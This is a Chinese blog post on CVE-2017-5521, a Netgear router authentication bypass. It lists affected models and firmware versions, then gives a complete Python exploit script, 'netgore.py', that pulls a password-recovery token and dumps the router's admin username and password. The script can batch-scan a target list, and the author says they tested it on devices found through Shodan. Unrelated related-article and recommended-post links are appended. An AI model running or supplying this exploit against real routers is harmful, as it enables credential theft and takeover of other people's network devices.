SpiderLabs昨天发布的漏洞, 用户访问路由器的web控制界面尝试身份验证,然后又取消身份验证,用户就会被重定向到一个页面暴露密码恢复的token。然后通过passwordrecovered.cgi?id=TOKEN获取到路由器管理员密码。

漏洞细节

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911

漏洞影响范围:

Finding 1: Remote and Local Password Disclosure

Credit: Simon Kenin of Trustwave SpiderLabs

CVE: CVE-2017-5521

Version affected: 

# AC1450 V1.0.0.34_10.0.16 (Latest)

# AC1450 V1.0.0.22_1.0.10

# AC1450 V1.0.0.14_1.0.6

# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)

# D6400 V1.0.0.34_1.3.34

# D6400 V1.0.0.38_1.1.38

# D6400 V1.0.0.22_1.0.22

# DC112A V1.0.0.30_1.0.60 (Latest)

# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)

# JNDR3000 V1.0.0.18_1.0.16 (Latest)

# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)

# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)

# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)

# R6300	V1.0.2.78_1.0.58 (Latest)

# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)

# R6300v2 V1.0.3.30_10.0.73

# R6700 V1.0.1.14_10.0.29 (Latest beta)

# R6700 V1.0.0.26_10.0.26 (Latest stable)

# R6700 V1.0.0.24_10.0.18

# R6900 V1.0.0.4_1.0.10 (Latest)

# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)

# R8300 V1.0.2.48_1.0.52

# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)

# R8500 V1.0.2.26_1.0.41

# R8500 V1.0.0.56_1.0.28

# R8500 V1.0.0.20_1.0.11

# VEGN2610 V1.0.0.35_1.0.35 (Latest)

# VEGN2610 V1.0.0.29_1.0.29

# VEGN2610 V1.0.0.27_1.0.27

# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)

# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)

# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)

# WNDR4000 V1.0.2.4_9.1.86 (Latest)

# WNDR4500 V1.0.1.40_1.0.68 (Latest)

# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)

# WNDR4500v2 V1.0.0.42_1.0.25

# WGR614v10 V1.0.2.60_60.0.85NA (Latest)

# WGR614v10 V1.0.2.58_60.0.84NA

# WGR614v10 V1.0.2.54_60.0.82NA

# WN3100RP V1.0.0.14_1.0.19 (Latest)

# WN3100RP V1.0.0.6_1.0.12

# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)

# Lenovo R3220 V1.0.0.13_1.0.13

Finding 2: Remote and Local Password Disclosure

Credit: Simon Kenin of Trustwave SpiderLabs

CVE: CVE-2017-5521

Version affected:  

# AC1450 V1.0.0.34_10.0.16 (Latest)

# AC1450 V1.0.0.22_1.0.10

# AC1450 V1.0.0.14_1.0.6

# D6300 V1.0.0.96_1.1.96 (Latest)

# D6300B V1.0.0.36_1.0.36

# D6300B V1.0.0.32_1.0.32

# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)

# D6400 V1.0.0.22_1.0.22

# DC112A V1.0.0.30_1.0.60 (Latest)

# DGN2200v4 V1.0.0.76_1.0.76 (Latest)

# DGN2200v4 V1.0.0.66_1.0.66

# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)

# JNDR3000 V1.0.0.18_1.0.16 (Latest)

# R6200 V1.0.1.56_1.0.43 (Latest)

# R6200 V1.0.1.52_1.0.41

# R6200 V1.0.1.48_1.0.37

# R6200v2 V1.0.3.10_10.1.10 (Latest)

# R6200v2 V1.0.1.20_1.0.18

# R6250 V1.0.4.6_10.1.12 (Latest beta)

# R6250 V1.0.4.2_10.1.10 (Latest stable)

# R6250 V1.0.1.84_1.0.78

# R6300	V1.0.2.78_1.0.58 (Latest)

# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)

# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)

# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)

# R6700 V1.0.0.26_10.0.26 (Latest)

# R6700 V1.0.0.24_10.0.18

# R6900 V1.0.0.4_1.0.10 (Latest)

# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)

# R7000 V1.0.4.30_1.1.67

# R7900 V1.0.1.8_10.0.14 (Latest beta)

# R7900 V1.0.1.4_10.0.12 (Latest stable)

# R7900 V1.0.0.10_10.0.7

# R7900 V1.0.0.8_10.0.5

# R7900 V1.0.0.6_10.0.4

# R8000 V1.0.3.26_1.1.18 (Latest beta)

# R8000 V1.0.3.4_1.1.2 (Latest stable)

# R8300 V1.0.2.48_1.0.52

# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)

# R8500 V1.0.2.30_1.0.43

# VEGN2610 V1.0.0.35_1.0.35 (Latest)

# VEGN2610 V1.0.0.27_1.0.27

# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)

# VEVG2660 V1.0.0.23_1.0.23

# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)

# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)

# WNDR3400v3 V1.0.1.2_1.0.51

# WNDR3400v3 V1.0.0.22_1.0.29

# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)

# WNDR4000 V1.0.2.4_9.1.86 (Latest)

# WNDR4500 V1.0.1.40_1.0.68 (Latest)

# WNDR4500 V1.0.1.6_1.0.24

# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)

# WNDR4500v2 V1.0.0.50_1.0.30

# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)

# WNR1000v3 V1.0.2.62_60.0.87 (Latest)

# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)

# WNR3500Lv2 V1.2.0.32_40.0.74

# WGR614v10 V1.0.2.60_60.0.85NA (Latest)

# WGR614v10 V1.0.2.58_60.0.84NA

# WGR614v10 V1.0.2.54_60.0.82NA

# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)

# Lenovo R3220 V1.0.0.13_1.0.13

Netgear漏洞利用exploit:

## netgore.py

import sys

import requests

def scrape(text, start_trig, end_trig):

    if text.find(start_trig) != -1:

	return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]

    else:

        return "i_dont_speak_english"

def exp1(ip,port):

    #disable nasty insecure ssl warning

    requests.packages.urllib3.disable_warnings()

    #1st stage - get token

    # ip = sys.argv[1]

    # port = sys.argv[2]

    url = 'http://' + ip + ':' + port + '/'

    try:

        r = requests.get(url)

    except:

        url = 'https://' + ip + ':' + port + '/'

        r = requests.get(url, verify=False)

    model = r.headers.get('WWW-Authenticate')

    if model is not None:

        print "Attcking: " + model[13:-1]

    else:

        print "not a netgear router"

        #sys.exit(0)

    token = scrape(r.text, 'unauth.cgi?id=', '\"')

    if token == 'i_dont_speak_english':

        print "not vulnerable"

        #sys.exit(0)

        return

    print "token found: " + token

    #2nd stage - pass the token - get the password

    url = url + 'passwordrecovered.cgi?id=' + token

    r = requests.post(url, verify=False)

    #profit

    if r.text.find('left\">') != -1:

        username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))

        username = scrape(username, '>', '\'')

        password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))

        password = scrape(password, '>', '\'')

        if username == "i_dont_speak_english":

            username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))

            password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))

    else:

        print "not vulnerable becuse password recovery IS set"

        # sys.exit(0)

        return

    #html encoding pops out of nowhere, lets replace that

    password = password.replace("#","#")

    password = password.replace("&","&")

    print "user: " + username

    print "pass: " + password

def exp2(ip,port):

    #disable nasty insecure ssl warning

    requests.packages.urllib3.disable_warnings()

    #1st stage

    # ip = sys.argv[1]

    # port = sys.argv[2]

    url = 'http://' + ip + ':' + port + '/'

    try:

        r = requests.get(url)

    except:

        url = 'https://' + ip + ':' + port + '/'

        r = requests.get(url, verify=False)

    model = r.headers.get('WWW-Authenticate')

    if model is not None:

        print "Attcking: " + model[13:-1]

    else:

        print "not a netgear router"

        #sys.exit(0)

        return

    #2nd stage

    url = url + 'passwordrecovered.cgi?id=get_rekt'

    try:

        r = requests.post(url, verify=False)

    except:

        print "not vulnerable router"

        #sys.exit(0)

    #profit

    if r.text.find('left\">') != -1:

        username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))

        username = scrape(username, '>', '\'')

        password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))

        password = scrape(password, '>', '\'')

        if username == "i_dont_speak_english":

            username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))

            password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))

    else:

        print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"

        return

        # sys.exit(0)

    #html encoding pops out of nowhere, lets replace that

    password = password.replace("#","#")

    password = password.replace("&","&")

    print "user: " + username

    print "pass: " + password

if __name__ == "__main__":

    if len(sys.argv) > 1:

        ip = sys.argv[1]

        port = sys.argv[2]

        print '---------start------------'

        print 'target',ip,port

        print '---------exp1------------'

        exp1(ip,port)

        print '---------exp2------------'

        exp2(ip,port)

    else:

        f = open('target.txt')

        for line in f:

            line = line.strip()

            l = line.split(' ')

            if len(l) > 1:

                #print l

                ip = l[0]

                port = l[2]

                print '---------start------------'

                print 'target',ip,port

                print '---------exp1------------'

                exp1(ip,port)

                print '---------exp2------------'

                exp2(ip,port)

        f.close()

  

 

shodan搜索后测试了几个netgear设备,这个漏洞很清真:

CVE-2017-5521: Bypassing Authentication on NETGEAR Routers(Netgear认证绕过漏洞)的更多相关文章

  1. Apache Hadoop RPC Authentication 安全绕过漏洞

    漏洞名称: Apache Hadoop RPC Authentication 安全绕过漏洞 CNNVD编号: CNNVD-201308-425 发布时间: 2013-08-28 更新时间: 2013- ...

  2. Authentication讲解(Spring security认证)

    标准认证过程: 1.用户使用username和password登录 2.系统验证这个password对于该username是正确的 3.假设第二步验证成功,获取该用户的上下文信息(如他的角色列表) 4 ...

  3. NETGEAR 系列路由器命令执行漏洞简析

    NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和 ...

  4. ASP.NET Web API 通过Authentication特性来实现身份认证

    using System; using System.Collections.Generic; using System.Net.Http.Headers; using System.Security ...

  5. [bug] Authentication failed for token submission (认证失败)异常

    原因 gitee上下的项目,启动后能访问首页,但登录报错.原因是根据用户名上数据库查密码没有得到结果,中间任何环节有问题都可能导致,我的是因为mapper.xml中的<mapper namesp ...

  6. webgoat白盒审计+漏洞测试

    前言 小白,记录,有问题可以交流 乖乖放上参考链接: https://www.freebuf.com/column/221947.html https://www.sec-un.org/java代码审 ...

  7. 应用安全-软件安全-漏洞CVE整理

    jira ssrf CVE-2019-8451 url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu ...

  8. CVE

    一.简介 CVE 的英文全称是"Common Vulnerabilities & Exposures"公共漏洞和暴露.CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者 ...

  9. 使用public key来做SSH authentication

    public key authentication(公钥认证)是对通过敲用户名.密码方式登录服务器的一种替代办法.这种方法更加安全更具有适应性,但是更难以配置. 传统的密码认证方式中,你通过证明你你知 ...

随机推荐

  1. 最后一片蓝海的终极狂欢-写在Win10发布前夕

    作为一名Windows8.x+系统平台从业者,从工作伊始,耳边不断充斥着Windows将走向没落的言论,Win10今日晚些时候即将发布,笔者借此机会,说说自己的看法. 早在2012年的时候,IDC曾预 ...

  2. 使用JDK自带的keytool工具生成证书

    一.keytool 简介 keytool 是java用于管理密钥和证书的工具,它使用户能够管理自己的公钥/私钥对及相关证书,用于(通过数字签名)自我认证(用户向别的用户/服务认证自己)或数据完整性以及 ...

  3. 第十八篇 模块与包--time&random模块&模块导入import(os.path.dirname(os.path.abspath(__file__)))

    模块 在Python中, 一个.py文件就称为一个模块. 使用模块的好处: 1. 最大的好处就是大大提高了代码的可维护性 2. 编写代码不必从零开始.一个模块编写完毕,就可以被其他地方引用.在写其他程 ...

  4. [P2387魔法森林

    题面 题意: 给出一个图,边权有两维,a与b. 求1到n的一条路径使得路径经过的边的最大的a与b的和最小,输出最小之和. \(Solution:\) 如果做过这题,那么就显得很简单了很好想了. 又是想 ...

  5. LeetCode 2——两数相加

    1. 题目 2. 解答 循环遍历两个链表 若两个链表都非空,将两个链表结点的值和进位相加求出和以及新的进位 若其中一个链表为空,则将另一个链表结点的值和进位相加求出和以及新的进位 然后将每一位的和添加 ...

  6. 文本向量化及词袋模型 - NLP学习(3-1)

    分词(Tokenization) - NLP学习(1) N-grams模型.停顿词(stopwords)和标准化处理 - NLP学习(2)   之前我们都了解了如何对文本进行处理:(1)如用NLTK文 ...

  7. PHP Warning: File upload error - unable to create a temporary file in Unknown on line 0

    代码在本地运行一切都OK,放到服务器上,网站访问正常,上传就出现该错误. 提示:PHP Warning: File upload error - unable to create a temporar ...

  8. django类视图简单使用和源码解析

    django的类视图,CBV: 我们在开始接触django的时候,习惯于使用函数编写视图,即FBV.使用FBV时,我们只需要在路由匹配时,对应的路由下找到这个函数就可以了,这样做看似很和谐,但是有的时 ...

  9. DFS(8)——poj2034Anti-prime Sequences

    一.题目回顾 题目链接:Anti-prime Sequences Sample Input 1 10 2 1 10 3 1 10 5 40 60 7 0 0 0   Sample Output 1,3 ...

  10. [剑指Offer] 36.两个链表的第一个公共结点

    题目描述 输入两个链表,找出它们的第一个公共结点. [思路]找出两个链表的长度,然后让长的走两个链表的长度差,然后再一起走(因为两个链表用公共的尾部). /* struct ListNode { in ...